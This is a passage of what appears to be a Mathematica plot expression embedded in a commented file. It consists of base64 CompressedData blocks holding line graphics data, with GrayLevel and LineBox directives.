+%UQeF/fc1B+3NJY+O/4+32L6lNpc86mCRzYR5UVvzyKMO9DZbrbtYlEce9WA1 +%w8COvzafPOoh3SfIODcznzzqwe12cr91SwvIox5SRvB2uKYXkEc98DhqF6lj +%IXnUw9beZyJtUgrJowFsrQ6d0ZpfRB4NYHrH/+TapCLyaIAuOL1mtn0xeTTA +%GuPw70VJxeTRABNkzUUqhxLyaACvueemlaeWkEcDOFnuMly9qJQ8GsFlgFfM +%gV+l5NEI+U+NetquLCOPRngeGBIYmFdGHo2wcvfdxR82lpNHI5zRh4MnK8vJ +%oxG4C3e46NhUkEcTNMd1Tw5wryCPJpi5wunA1TcV5NEEPv2vtpRoVwJzvWyC +%hNniq7emV5JHE+j1eBv69GwleTTBucifASNTKsmjGQ6uu2yt37WKPJph027d +%liWrqsijGZZWO1vp3K0ij2ZIWrG+uVtlFXk0w5uBsu6Bw6vJoxnEvr7uFw5W +%k0cLZAa39qx4X00eLdCw/9iod4oa8miBzg+mjuIvqiGPFni9sK/u26Aa8miB +%Al/97Y1lNeTRAv945ufdGFFLHi3Qpbvry89Ha8mjFbJ6eHq7xdeSRyu4t5vZ +%X+9SRx6t8HFCVbC9Ux15tMJJ19DlHmF15NEKBUP6rQJePXm0wrlbvnoec+rJ +%ow2GN6beXXKtnjzaIEQ7Qvmhop482mD5z+vvorGBPNrApmT4yTlnG8ijDfQq +%YhoOZjWQRxsIRxUOnz2kkTzaoelrk27YP43k0Q6orNB8m9ZIHu2w1HNA0X7L +%JvJoB0Mb7tisQ03k0Q4nnwiKeSlN5NEOrolmkc/6NZMHB0+MWM0dc6SZ6uFg +%7LMxG3Z/byYfDm6x7mLnOqiF6uOg79Tpd829WsiLgzNttkwMz2mBv+Wu5eC3 +%2QNna0Mr+XFw67ivTf0vtdL1gYPJni0OpnWt5MlBz/itIby5bZQHB1sbMyRR +%D9vIl4Mng7Y/Wydrp3w4+GOPlMvf2k7eHDwaGWJx6ks75cXF5DI/5+OGHGT8 +%ueh/JmX++ykcZPLj4nHJw1On9nKQ6QcujnPtZ5PxHweZPLmYMH6oV0QGB5n+ +%4OL7L1PajHW5yOTLRRvp2tM9J3OR6RcuvjN3mfxkHxeZvLnIyX8mKwzhItM/ +%XLR7Glv1NJ+LTP5c3Ou/b/LgbhrI9BMXh4UZzZ9nr4EMhwbKe4SeMfXWQMZD +%A9/FH4OwaA1kPDRwxL86ri1tGsh4aGBk9AfkjtBExkMDd7rFhH/boYlM/2ng +%4ATDJ1seaCLj0THvBndRdrEmMh4a2Du8LXiYOQ8ZDw18dd4yfPs6HjIeGmia +%1DnC7xYPGQ8NtN/c//GDPB4yHho4LPTEwxhTPjIeGhj4wmluhRMfGQ9NLJ7n +%mGv8H588NHHZ7mzu/ko+eWjij+WDrPjWWuShiUM9n54O3a9FHproO9Y5/0m0 +%FnloomCt/IGmTJs8NHG00ZFz9x21yUMTM0cbX4i9qU0empi9YeGrzdXa5KGJ +%Xvo9TS+P1SEPTaxVVV3c76NDHprYMNZ2uixPhzx4+NEnJXbXSAF58DBb97z7 +%xzMC8uBh2zLR5oGFAvLg4QHhp+f3xgnJg4cRws6zVl8VkgcPraICnnu0C8mD +%h14jQjcPXyEiDx7GpEws8owWkQcPV1zemBzdT0wePFzjsF5Hx09MHjzUuXtS +%5ceTkAcPJzs6TQ/YKSEPHgZO/xLhXCQhDz4mdptgumiVlDz4uPCrVpRPhpQ8 +%+HjQZoT/uZUy8uBjr415hx8UysiDj6tc5vYeOUpOHny89DlzY8RROXnw8YP4 +%2ODrCXLy6Dh+bFe1XS8FefCx3n/ZZ4tdCvLg45ul2VYv4xXkwccGvW3hdwco +%yYOPe54UTHjkqyQPLbzbdNf7AkdFHlrIUWPfEBcVeXT0kUty5/FVKvLQQr7R +%zaMz9uqSR0dfRW7eoKfUIw8tdO/WLXFihB55aGGd1ZKK9W765KGF41+08r7P +%NSAPLTzbeGeVaIEheWihmb5sW85FI/LQwtHDQspjbDuThxbqTQ8JHBXclTy0 +%8NGVKzfH2fUkD208suB8pPknQ/LQxrkbyiR29/TIQxtTp7aeKF+rSx7aOOrC +%4WEXL6nIQxsrrU5OsNVSkYc2Opd6f15yTkke2rhlkNmQe4OV5NFxXpgZWaZm +%sx7a+CT3WZoikPXQxvCAL9Y/VrIe2vhc5jRvuaWCPDr2HbF5eaucPHQwNt7k +%dUGHN+Ohg8szu38bf1dOHjroOoNTnO0hJw8dNLh9xX/Wajl56ODH7Zn+AyfI +%yUMHHS8WbhlqJicPHayrWcPvLpEjc//UwWNdgnq45cvIQwc1LfudCQmXkYcO +%9p/le+K+p4w8dNBUEuTfbbmMPHTQwS6g5JO1jDx00LKqzOSEQkYeAlyvv2CP +%WSl7fgjwXtXzlkMf2PNDgJ2Gvm1w/p+UPAQIid39v5+QkocAz37gLb2+UUoe +%AnQ03/Xp3kwpeQhwEH93Yf4gKXkIULVkY9dRhlLyEODI1Z+X+LdJyEOAe0VR +%B6pyJeQhwJeuv+v6f5aQhwBX5R4QTA2XkIcQ+00ct2nwNQl5CHFSXO2vn14S +%8hCi/y/dk2N3SchDiI0ub9bbr5KQhxCD7zSaSmdJyEOIptmFtStGS8hDiP8z +%vvlmmoWEPIRosnSx6K2RhDyEuDVm966XOhLyEGL/5o2FoxvY65UQy276/BhW +%ICYPIVb0vOMXlComDyH+1+p95UismDxE+LzfgvNxEWLyEKEgPUCx976YPEQY +%O2uA8mSAmDxEGCbuv6X5jJg8RLguUKV8e0RMHiKcK3jUNcdVTB4i9JiQmDp/ +%g5g8Ova33QgwXComDxFW/HvZ1XyOmDxE+H2cfOGRiWLyEOHPuV0/m4wSk4cI +%Rw4yGS4cKCYPMb7rbJ08qLeYPMQoWBQ86XInMXmI0eHZiU0oF5OHGL3HDbja +%U0tMHmI06GPUbNMiIg8xrkz1MThdJSIPMYYeLQs1KBSRhxiN6nPOJv5m7x9i +%PHTWI/p1sog8xHhsAudK1icReYjx48pae6uO+w3jIcbS10cy7j8XkYcY7beN +%z5j/REQeErzdq+Rh3/si8pDgogMWm0yDROQhQcPN9tEz/EXkIcFrpVMXXfYV +%kYcE3Ve7L5Z6i8hDgvsWHku//cfhr4cET9WPX7n6gIg8JPhTc/GC8btE5CFB +%jwdPJkzscGQ8JDgqLkTo5CQiDwka3NnW9f5KEXlIMLXx8TtpRx8wHlI0Gfrg +%/ml7EXlIMfRmulV/OxF5SHH1ovT9RZNF5CHFSdue178eKyIPKb5clnwkzIb1 +%6LhObBxhGT2M9ZCiw+ry96UDWQ8pfnXPnzDQgvWQ4qgVQi/P3qyHFH3vnX/R +%2p31kOJQ3dTo451YDykG8swCzfVYDynumvhQniVjPWR4e2LdqYdC1kOGd/wm +%p/ryWQ8Z1h+OifHmsB4yDGyy5V5uFpKHDAsXqVIj64TkIcOf+d2tKyuF5CHD +%AylXDEeUCslDhpv2nfjtWyAkDxmeOjjzCDdHSB4yPGuVevvgbyF5yHDv1AVN +%inQhecjwtYk793GykDzk2NX8Ysuar0KqR46iVP5Q889C8pFj3kuDSS2xQqpP +%joYDWuf/ihaSlxxf+PUoi38lpHrleOOkdvjXF0Lyk6Pa521i1jMh1S/Hx+1G +%CZww9vlMjm2Lp6RZPmLzkGNBj/bY9cFCZN5nOu476/YWP7zL5iNHq7DgG1q3 +%2ec3OVaevW3qdIPNS47lccqA1EAhPT/IMZ0/ycTen81PjsZDV+/4eVFI/SDH +%6c5vmredZ/OU48iN7p7Kc0LqDzl6XXU2Up9i85Xjhv5Nuq5eQuoXOQb5BPUb +%cZzNW47TJA8rtDyE1D9yjPfwP/T7EJu/HOf17rv69QEh9ZMcz7Xoj324l/VQ +%YJ5Gb7M7bqyHAuHBsCF3d7IeCkx4fu126HbWQ4G2ZxsHfdzKeijQftr1psJN +%rIcCM8y/LFFuYD0UaB0SrTt+HeuhwHqfrF0HVrMeCtTvMz3z1QrWQ4FCboNS +%uox9flZgnx4tUSsXsx4KfHuv2kvtyHoocMWXDVEmDqyHAo2CTZeem8d6KNBj +%qnO99hzWQ4EH7B9P9LBjPRToGHFHXziD9VBgb4d9tRemsh4KvHz1XTeLyayH +%Ant8CV8XM4H1UOCMkVYjncaxHgpcN6abg2oM69FR75Tvs97ash4KxM3JbXtt +%WA8Fpr25fWXkSNZDidf1lpa3W7MeSuzbuVfEx6GshxI3Ogi0AwazHko85/Xo +%k6sV66FE25/LdtoPYD2U6PZsQdJIS9ZDiQOv6Bv0sWA9lCi4yNtoYM56KHFl +%U6yt1JT1UOJUt4hRot6shxI3KOSPJMashxLN93vl6PVkPZTY/L6+xLg766HE +%IapVUuuurEfHfHe+JNh1Zj2UOCWiJGyzEeuhxBXVRulnDFgPJf7PetaiZ3qs +%R8f+4bSwPBXroURV1to4QyXrocQj/V2WzJKzHkq8O2DNvpNS1kOJfcIUNz+J +%WQ8lFojPfFWKWA8lBqgn9VoiYD1UKHTg6t/XZj1UOPfEleh2Puuhwp+xr7Y7 +%8FgPFcZ3VWs+0WA9On4/cmO2Lpf1UGFfYd85u9vZ90cV3ihKm5/VKiAPFdrc +%mxNm1yIgDxXqn71l/KpJQB4qPFUxy2FYo4A8VDhoZoDmw3oBeagwwSZpgGWd +%gDxU6HqWj8E1AvJQ4dV1Rw8PrhaQhwp/VxQufV4pII+O96i4M7mTKwTkoUK/ +%DTv6p5UJyEOFlY+G/LOpVEAeKtxxcYAbr0RAHh3vJZHL1gQWCchDhbc1upWP +%7nhfZjxUqO57Lfp3voA8VLjxznOlR56APFR474X0i2WugDxUuDpzSmJatoA8 +%dPHMBqeU41kC/D+QSguY +% "]]}, +% {GrayLevel[0], LineBox[CompressedData[" +%1:eJw113dczfsfB/BzTvPMzoispGGEzJtrv98qZFzRtSJZyYpCXDKvkK3749rE +%jcxKSEY5lAZpUlFJpb3XaY9fnPfn+0+P+n7P5/N5v57v8/30MV7lZr+Gx+Fw +%VFwO5+dPdg3+Y5N4+KVq5W79wOm5nofA0/+3/IGu7PdzEN594CYdqFY+73u4 +%bN7z6/Cs6XVygozdvwX6g/qU18VWKS9f+nndg0fWhkbCzVX0fCCk7Bv4qFZe +%pSyf9/MvwdBjiWr0ndBK+vxT6BD6xJg4VioF6X7ukwShMKbG1HA1p5LGewHZ +%++0H7btVoTR3PBOhGhQGO2rTps+3raDxX4P+DdstzWXlyltdn073ewOhltbC +%ZWfKab63kL88dvbVUeXK0b+uSEiV5ReeTy2j+d/B1ee6G5bvLFNGqgZ1zRAF +%O5xbi+t7ldF6YuBqovuk2eGlSvtfE8ZCg8fgHNflpbS+9xAbPnuZE7dUmev5 +%c8APwLkqCRD6ldB6P0LyuaUuJ2xKlFt+Ls89Hqwnx71NKCim9SdA2Lp9JzKP +%FCvVGkmg52Y18uHAYqonCYKa3nNmxBYpbX9NkAzXJAc2PlhXRPUlwy3jzsI4 +%3SLlz9kcz6RA5tkn7hF3C6neT2CYE3l5l22h8lc56Z8gZmfeAlVRAdX/GdxP +%PHIY712gNPq5nL6pUGIc6jhlQAHlkQq/dwwM1YvKV651+XmlQdEq8YQbq/Mp +%n3TQ+K3kdQM3X/lzNP3AdEjs7GfW7cYPyusLRINQ0jTph7Lh53CqL3Aq4suQ +%S5l5lN9XUOVmFPJ25Skn/xowA/zPXTQf2j2P8syA50NHfen+JFf5a3mHM6Fk +%pgKi7HIp3yxQZedNtizPUcZ//HllQYjzNff1R3Mo728wKLf4nINZjrLbrwVm +%w8fBR5b3P/Cd8s+GaTsvhotCs5W/hnP8Dk5X27ttrPhGHjkw0WnO10mm36ie +%HFgd86Jn4OIs8smBsOJpIT6nMqm+HDjyg38t+20GeeXCbW2vRc9UX6neXPC2 +%2u/FM/9KfrnA3eSv/W7pF6o/Dza+Oe7deiqdPPOg7MDX9TeUaZRHHvydM2hj +%YnUq+f6AKzGlzm7GqZTPD5iXYM7bN+8zef+AJ2KTqsoDnyivfPhkG+SQEpRC +%/vlwPim0b7/sZMovH2xsj1/OFyZTPxRAwve5vbnjkijPAugR4NA8LC6B+qMA +%rlVsSZ9lGk/5FsK9U3H3eZ5x1C+FIGlW/uuZ+J7yLuwab8GecNNY6p8iGO9+ +%4EzhjmjKvwgcbTSuPIt9R/1UBDGWv3lb9owkj2Lw06yb4r3uLXkUQ7NjBkdv +%k5I8iqFu3o8HI7XDyKMYcFl/j9arz8mjBB79+8a1bUQIeZTAyqiAxNa3weRR +%Am8MF036cuMheZRCt1PtYX7Pbyt9fnmUwoDjh5J/O3eNPEohzF0ybo3DGfIo +%A6ltcsLzU0vJowwKl/+5aPPxo6D2KINhTwt+t553GdQe5ZAoVsaeHn0L1B7l +%0G3btXHHpj4AtUc51C31i9g/LBjUHhVQNfNA46vwp6D2qADz/unbP9o9B7VH +%BdhscL75Kf8VqD0q4UyNM7zYqwS1RyW0FS7vcffkW1B7VEJvQWa3MY6RoPao +%gjEF5+18LaJA7VEFpx/vbjvOiQG1RxV8Xvjmo0NqLKg9qkF6LNBP+eAD1VMN +%a68EO1sd+ghqn2qwG7Dkej+nBKqvGvz17Zf0MkwCtVc1bPg2vL1EmEz1VsPY +%1QLfqNZkUPtVQ+VX5Qf/8hSqvwYMBla+cMn+BGrPGuAG7p1skfyZ8qiByg+T +%fpS9SwW1bw2sjO5Xe/tFGuVTA6/GTHA7F5QOau8aMJlqZ+3l/4XyqoXIurm3 +%V1//Cmr/Whi4fyLf5UIG5VcL1teK3Lz/yQT197MWjF2PZoeczKI8a+HJvVnv +%dY99A3V/1MLmiKySE0eyKd866FXzunrm4e+g7pc6GBXTuf+SVQ7lXQfc2kWB +%+pE5oO6fOrjbvqZ4ik0u5d/1/O4B3lrRudRPdRDwMbl9v20eedRDbIXy7am4 +%PPKoh8yLgZZWdj/Iox7e7L5w6+anH+RRD2aen4fdXJxPHvVQ5j55vEd2PnnU +%g2dzg26+cwF51EPtjUdT+OUF5KECYWhP5+JtheShAvel//O93lZIHl33VU4h +%zYeLyEMFE6Lt+hpJi8lDBa17/+gluVJMHioY1So/8W5ACXk0QIjDswKbJyXk +%0QBr37y56Iul5NEAW+L8xsQllJJHA7xvaX4Wv6yMPBogvnlQw7OKMvJoAGXd +%UdHefeXk0QivfDJmWEoryKMRhnlJL3z+r4I8GiHgjPNchzGV5NEI/w4LPZH+ +%oZI8GmGUym6X3Yoq8mgEh2aVLKKhijyaYE5q1jKT6dXk0QQlw8w+LztbTR5N +%IE57eXFUTjV5NMEGvVozT4sa8miCfO302fN315BHE3zof8Ip4n0NeTTB5rTT +%VyJ61JJHM3B2Xk+yX1dLHs2QluP7ZF9XX6o9mqGh3qvZll9HHs1gpJ138fGS +%OvJohhGpbSvCH9aRRzMknvxTd3NnHXm0AHSGXky0ryePFhgzufVOhn89ebTA +%FIXlf0da60H9vmwBB72ipsa5KvJogVjf7lLjOyryaIFkc9tGfoeKPFrBcOti +%8aMFDeTRCrevX3GxCGwgj1boF5dvtFmnkTxaISfwndOBlY3k0QomRgY/Noc1 +%kkcrHHlwr8aiRxN5tEF+5KrEDI8m8mgDX/25591TmsijDXQ0C3PLRzSTRxtE +%X4j0W+nTTB5t0DvJ1zClupk82mBZvHTxNPsW8mgD/rT3CyKftpBHOzxtfHd/ +%aY9W8miHovSG97y9reTRDkGizVMS81rJox3mbDuT/nZGG3m0w4qNx4wKgtvI +%ox0875Q9ntm7nTw6IPjI56aWw+3k0QFXt3OOltW0k0cHuKnyAu2Xd5BHBwQd +%uh5mkNBBHh0wanODxazJneTRAaNzd5xvDeokj04oWeJZcEnGQbVHJ7wr2nRE +%PJuDao9O+G+tcdRcbw6qPTqhbrGv65ZIDqo9OkF/4PUH2zhcVHt0wgl/XbcN +%k7lIxw8UJI05u2gvF9X1cBCl9scwnItqHw6aTkgy+62Di+r6OFh4PmCbFfJQ +%7cXBD/d77v3Li4e/ynXhYNbMBSPjY3io9uOg2bkZWavEGqh+P3DQ4KzK64/5 +%Gqj25ODMx3O27L+qgeo8OCjteBpiXqiBal8O8rYlr5w+UhPV+XAQ7jcpyvZq +%otqbg8YbRm0e+1ET1XlxUf/FX74j+2ih2p+Lnat6DO3cpEX5cfFl8FiLgLda +%qO4HLh4VGQ9ebqBNeXLxRVzfxQPctFHdH1z8ZJQ01uK9NuXLRV9pypgL/XVQ +%3S9dOXlM2Hf0kA7lzcVlwvVLpIU6qO4fLjYt9xi3c6Yu5c9FLc+P2U3Buqju +%Jy7+I9g47mofPnnwcNhL311hx/nkwcPoDudTfm188uBhvJ5BwPGtAvLg4d8O +%UWbPywXkwUOx8/LprzYKUd1/PBxfHFflXyUkDx6+CVq3a+guEXnw8O7Cjffu +%6orJg4cbfWIL4q6LyYOHt5Pfz5AF9SYPHnb7LBoSy+1DHjwMM3QOaV3chzx4 +%GGR6rLdhSB/y0MC/0/Iza7obkocGZk8JsRXuNyQPDVz1oXTUkkpD8tBANIve +%2telL3lo4Pht33pvKOpLHhp4v8+2qhEeRuShgTcW/jN/rE4/8tDAThPrP244 +%9iMPDZQs3DHHLqwfeWjg14FBwQJzY/LQQM9v376Y3jEmDw08qLI/vWKSCXlo +%otuIJIlzowl5aOLIwRn+O8pNyaPr/iGRbdX8/uShiQZZ3+dO6DGIPDTxYWd8 +%jCKjJ3loYknACkHIoO7koYmPex61bXymTx6aOH5MmMAxWUEemijWd/3DaKiC +%PDTR8L1NYa+HcvLQxChweatvIycPTVyy0ju6tlxGHpr4+ftTU/xPRh5aGP17 +%4m7jlTLy0MIBPoOzjg2UkYcWLo25u1G7XkoeWniJJ+x5LUpKHlo4u1D/wror +%UvLQwo+9dwYleEjJQwtv3g84NXWelDy0MP+CXbTbCCl5aGFa6qvF9TIpeWhh +%k7zVtVeZHnlooXsfk+jqED3y0EJN/81nZYf0yEMba819Xcct0CMPbXwdHjWF +%a65HHtoY9Ubv3ymdEvLQRp6Z7+176RLy0MaRL+6M7PtYQh7aaOx83Hn9aQl5 +%aGNV+czgTa4S8tDGluKpjzVnS8hDGz1qb+jqW0jIQxtNjZdpe+pJyKNrfQOu +%pPSvE5OHNmrsSQpsSxeThzb2EY/dXRYuJg8dLHGqds+7JSYPHdTP0f6ccFJM +%Hjro8yfY+G8Xk4cOLg/33Dx/uZg8dNBb9iQ2aYaYPHTQSDJimNRSTB466G/S +%mqpjLCYPHTTfGaJ5VywmDx107N1rZ2WLiDx0cGSywcfEYhF56GD47/XdbNNF +%5KGDzQ+99s+OFpGHLmbrTHzyKUREHrpYzdsd8e22iDx0cfSGqMmrzovIQxeH +%9c7hO3iLyEMXX05J7/F6p4g8dLG5V8m8UxtE5KGLi55effDOUYTq/VMXvxqp +%+jrYichDF2M8suNmW4nIQxc5OS79L1qKyEMX2wyyD04wF5GHLh75Ni1wmKGI +%PHQxooeBdJtMRB58/LtgtCNPW0QefMy//1dxVouQPPgYv2b31tau96nag4+v +%XgSecCoQkgcfl5ekGWhkCsmDj896xRgXJgnJg4+Dd52M1IoRkgcfT1gIuCvC +%heTBx3spQcl1T4TkwcdvB9Ymvr4vJA8+2rqeLgq7KSQPPl6/sci++qKQPARo +%5yX0/NNHSB4CXLpte1WRt5A8BHhO5BR2b7+QPAT4tv2R34W/hOQhwDcnF395 +%7Mb2DwFqu64c27iW7R8CDDgy+tnqFULyEODU0szHzYuF5CHA0nqN5KfzhOQh +%wPXNrYfPzxSShwCXcS1DL1sLyUOAbgdbPkVMFJKHAEuMv6tEY4TkIURJdIVo +%13AheQgx2DsmX9OceQix0Op+aJAJ8+iqqxjSPfswDyFO/2qdv6o78xCi6Vfj +%UBcp8xDioI8Hg70FzEOIs2dGit9pMg8hjjBJutirU0AeQuzu1/j2RLOAPLpy +%0fJw6V4vIA8h5o/au+ZFpYA8RJhitX7dthIBeYhwT8PVy9PyBeQhQutX872G +%f2f7uQgnjHs/aEQG289FuNEsbfTUVAF5iNDC/4iPe5KAPET4wcZD+1GcgDxE +%6DVP8kQjRkAeInx18bnTxggBeYhQ3zH0ZmG4gDxEqMed+JvHCwF5iNCy4mu/ +%biEC8hChysMuOPqRgDzEaFw9euvxhwLyEOPShA6bFXcF5CHGPtutA6fdEpCH +%GJ10Ok5MvCEgj6733mj9xdZXBeQhRpdHdpccLgrIQ4yTps4u3X9OQB5iHLiE +%0/+pj4A8xJguWu/SdJJ5iDFlgK/FzGPMo+s9G9Gt495h5iFGf4HLgx4HmYcE +%b1yO/ufcPuYhweDq0j2Gu5mHBL+9rjj55C/mIcFdaXXOCz2YhwR3xjsO0trC +%PCRYse+k6s0m5iFBt14Bhkc3MA8JDrsksF26lnlIcHPGWfPxzsxDgsbufZ+a +%rWQeEuSb/q+ppxPzkGBBt57+PZcyDwmKeesHmy1mHnq4qseQK+MWMA893JOn +%cXixPfPQw5PWAScP2jEPPbxzQFUQMpt56OH7IXOSamcwDz18azD56LjpzEMP +%df13NR+1YR56qCzjD86bwjz08EuMz1MbYB56aJt57a+gicxDD+tdtf82Hc88 +%9DDZ82xf39+ZhxT3h5z+x9SS1SPFpcX3W4JGMR8pxqc8gqkjWH1STH3s0TvP +%gnlJ0fSDzcIjQ1i9UozrnDxplDnzk6JzxSyrwgGsfik6ZZ22v2nGPKXoenXo +%59UmLA8pZo9qX2jRT0DnGSnaD18wqMOQ5SPFT52Gw1J7M28pHtedavekJ8tL +%irEjxuZeNBDQ/w9SfL3uqMehbiw/Kc77WuC4Q8H6QYobrrQI3GQsTynOsLm4 +%c5Me6w8pHtq1ymarmOUrxYhYTYO9QtYvUsw38Lx9is/yluKQXe9e+umw/pHi +%rPMh+W+0WP5SNJ46uyNPg/WTFDO+WFQJeMxDhqtj/XljOcxDhhkV3kUbOth5 +%RIaH95Q5/td1HlF7yPBskEonp4WdT2RoLbr+p0kznzxk6PV41sv1jXzykGFm +%wZX1z1R88pBh9/DWYzr1fPKQYa0lRC6r5ZOHDDfYTk57Xs2n75sMeZYPAntU +%8clDht3qvYP3VPDJQ4Z7jYOHFnbti2oPGbbt8Hr5ZymfPGRoar9hX1Qxnzxk +%2KNuz/cJRXzykKEiup/LswI+eciwMbNshmU+nzy66onIcnyexycPGRY6KEWQ +%yycPGTqvtDr64TufPGRd++W6IodsPnl0Pe+4Pqk8i08eMrx+uWz6oUw+echQ +%33SWX98Mdh6U4z1RfHb4Fz55yFFof7f7inTmIceTcycaaacxDznGrYvTfPSZ +%echxzb31lss+MQ85BuS2TpekMA85Jtne3hSRxDzkODzlwlLPROYhx/xdlncs +%E5hH13p8EuPqPjIPOe6LmjE+JI55yHGuR3CO5wfmIcd0T9v/Wb1nHnLsNcRv +%oSSWechxXuTV4qxo5iHHPSr90YFRzKPr+VkNd7zeMQ854qL+q5dEMg85rm41 +%0bWMYB5y5G7b1iF/yzzkeG7B/rJaJfPoWp972j9pr5mHHHdecVgWFs485Cg7 +%fbrzVhjzkGPaC9l2n1fMQ4HXE9eH73vJPBRoNUU0x+0F81Dg6CVyyernzEOB +%X6sbZQ6hzEOBKxx5bfOeMQ8F7iqT1c4OYR4KfPhxnfGsp8yj69z3tDhx5hPm +%ocC+kdut/njMPBTIvdB9rX0w81DgmS9xdQ6PmIcCqw6dPLc6iHko0GtC761u +%gcxDgTNqHhzeG8A8FLjK23n86YfMQ4ELx0zk3HzAPLrGFy6c8ew+81DgvLuu +%ofH3mIcC1xTuVRXeZR4KNLvnNIB3l3kocOe3yQeN7jCPrvWIXGPBn3ko8Nje +%KcNX3mYeCjRasrvl0C3mocDl/LOj7vsxD31U8aOPp/zHx/8Dq98lgg== +% "]]}, +% {GrayLevel[0], LineBox[CompressedData[" +%1:eJw92XVYVNvXwPGhmWKKDhEMbEUM1Ktrid3YCihiKxa2qIAoBnaDioqg2Ipd +%iIFSiiAlId3dHe/8nLXf+ec+4zDnnL0++3tm5rlmyzfPWaXM4XCKVTic//2X +%PbQjVt3cYFYdulf78aRs1+3g/sXs10Yue34Ivlu9ilpRXRX6potX6ew3p6D3 +%mIPB81Kq6PULcCLT8uSYz1WhV3z/PeDzLT+b7vfY31+HuqG1aZyzVaFls//3 +%L/6w03WFS8Ju9v5AMHs28NatZVWhvOSALaN5QbCxuKlu5WR2vHtw9IJdTI9B +%VaG9HU5/qe/1ENLfKIen67HjP4Zpa0yFxp2VoYHydycHPIX7g7qt3xhTSecL +%hulPXSKe+1WGWv17PIfsgLEJRRsq6fwv4Ph7nrbhf5WhX+t7yc/wEj41GBkO +%4lfS9byGjdHN0aNTK0LnKE4Ih78b3xp5r4Ku7y04mTSt67e7IjTb9X8HfAfn +%qnfacSdV0PV+gKqCRz9zdCpCXf53eVtCYAVf9jMor5yu/yPsteqMdHheHqrQ +%+ASeE0MylDzLaT2f4Exd3RV/2/LQyf9O8Bly7xvs72taTuv7DEFfs/Y9LC8L +%/d/Z5KcEbtZSf+MPZbTeryAJG3d0t3dZ6L/lJH+F/FuvdvxYVEbrD4PBwxY3 +%yyzKQk3/dzldvoGp46os2/pSmsc3cJDdtNj5tTR0zer/Pb5D65m2Bu+zpTSf +%cICEdKubjqWh/zua9uNwcNjeZdT1/qU0rwiYe0IWeaq1JLThf4erj4CUA15n +%N0SW0PwiIWxa4f1xl0tCx/w7YBSYHjlkpLyqhOYZBQ4TT4z4OLgk9N/leUXD +%U6zf6sgpofn+gKRLQzM5McWhP3/8ewDf763D8avFNO+f0PbXeKXGuuJQnX8X +%GAPqNjONXYYV0/xjIM7JqiFWpTj03+EcfkGBXmhit7gi8oiFoea/nddeL6L1 +%xEJiqvYdX+ci8omFlFNZbh+ti2h9seD+ZKJ7sloRecXBDY/pq9N+F9J64+CY +%hQ8/+UYh+cWBe9SQ/z5vKKT1/4bvzt+KL44oJM/fwD9oc9tZvZDm8RsuRK8d +%1iu+gHzjgXMoKiPxRgHNJx6W+IU/2r2hgLzjYYX/8yz+iAKaVwKExV/tf0Kt +%gPwTYM3Er5eUf+fT/BLA5dZI8fLr+bQfEsFpc9cL79bn0zwTwbjlV1nHsHza +%H4mQvN5NNkoln+abBEe2XJ239Fce7ZckaIjUXbXvah7NOwlS2/5YHFqTR/sn +%GVotM57vs8qj+SfDHu1xHWs7c2k/JYNd9439JkXnkscfaEvj6Usu55LHH2j0 +%MkqOXp5LHn/A13995p4BueTxB56knjxq0JJDHilwf6nG5wffcsgjBRYdsftt +%cTaHPFLgs9vTyEsOOeSRCvYf9h4rtMgJPfPPIxU0jvNVR9dmk0cqSIzUc90+ +%ZpNHGvwYtS324bFs8kgD2xubT36fl00eaVBQ9X1/smk2eaSDU6uKb0JJFnmk +%Q0+uWuOHl1nkkQ53annfrnpkkcdfUDq+bZXTtCzy+AtN+3+46OtmkcdfaNlj +%cufG50zyyICzi7UHpCzIJI8M8I/aYZRcmkEeGZAuWWr52yODPDJB9PSkNFAn +%gzwywW30om5T7/8lj0wYZlh0+euYv+SRBWbFaR0Yn07ryYLgbNNLm9ekk08W +%TEm6vdK9NY3WlwXlPw3/XDydRl5ZcG7bss0e3dJovVlw1K/oVP/XqeSXBd+G +%PJ4cPTWV1p8NxVMKbC0zUsgzG1JOO0494pJC88iGiPx7NrdUU8g3Gy6Kxzje +%vvyH5pMN6a1DL13q84e8s0HT0UAyISSZ5pUDw/bsX58/K5n8cyBsQ6bvvJwk +%ml8OOK5v331mexL1mQOcHxDwQz2J5pkDHaOFWaE+ibQ/cmDtfjO/q30Sab65 +%cMBlgWzShwTaL7mwdUzLk6QZCTTvXNihrZ3aLzOe9k8ubN7/Jsp5SzzNPxf0 +%cnydzynF037KheHdIq9uOPebPPJgdYKpBXT7TR55cClx4tqE53HkkQf+eht/ +%TB0fRx55oPJSctAnIZY88uDswgHWL1bGkkceCPaa2B8u/kUeeTBw29fBNZq/ +%yCMfbv1NO2vTK4Y88iEvob/n6kk/ySMfVreUCKtW/SCPfNCf/eQU/1A0eeTD +%3uhlBma3osgjH8oadgmuh0aSRwHIek/vofQ3gjwKAB1GDMpqDiePArDy3cs7 +%oxtOHgWgE/9+/73B38mjAAbqlZU+nvmNPAogWtnSqff6MPIohNJC7Y/WXl/J +%oxCiFoS/HHTzC3kUgsEj9ef+7z6TRyGI+L0CTiZ8Io9CODOieOGZ9FDyKISc +%Xe5/F2t9JI8i6Dzq0aMJP5BHEfxYfyqqzuUdeRTB+T32vLRbb8ijCIKsH327 +%HfeKPIrAvjN+XDfOS/IogvXBJqKSAc/Jowhix63hdtgHk0cxOP83dMgXyRPy +%KAbPoaf7DVv7gDyK4b8dU5/afAwij2JY/evarHeSQPIohlvzB00dsOomeRSD +%o/vxzqz1vuRRArsTZaVzNM6RRwl8nvJshfYUL/IogafF2fnCn+voflkCHwev +%0zgVtQUUHiWwMtHiid64I6DwKIG6D0fX+krPg8KjFP7Embw9e+wKKDxKYdPQ +%8eMfKvmDwqMU5t6o5Ol+DgSFRykkcDpDAw7cBYVHKchOtK6WTHgICo9SeDKA +%Z/pK9SkoPMpAd+noUVGFwaDwKINIx7KNrtHPQeFRBpaW81ISnr4EhUcZpGWU +%ds649BoUHmWQ9KjT5sL+t6DwKIO+r3q1c1a9B4VHGTzLyf4weWYIKDzK4Rtu +%MRpoHQoKj3IYZZf3adnZT6DwKIe/qycen3LkMyg8yqFL1igfbbcvoPAoBxU/ +%G+G77V9B4SF//ip+KW4IA4VHBbgOM88UrvwGCo8KmOXzNPazw3dQeFTAgfqw +%9PL54aDwqICffYpCvGdFkEcFfM/ZZL17SiR5VMDxSV8Tt46PIo9KaEjs8mgG +%RJNHJej8mvV8+qgf5FEJu0KMcvyG/ySPSpjvn198dkgMeVRC+fvY86qDf5FH +%JVzYaFAxQD+WPKqgclvtm02XY2k9VTAtN6mbnl4c+VRB7dlrZXqX42h9VTB0 +%4fusgXq/yasKmhcmX313+Tf8W+7qKjgU+2D8Lv148quCHqoLQ375xoPi/iA/ 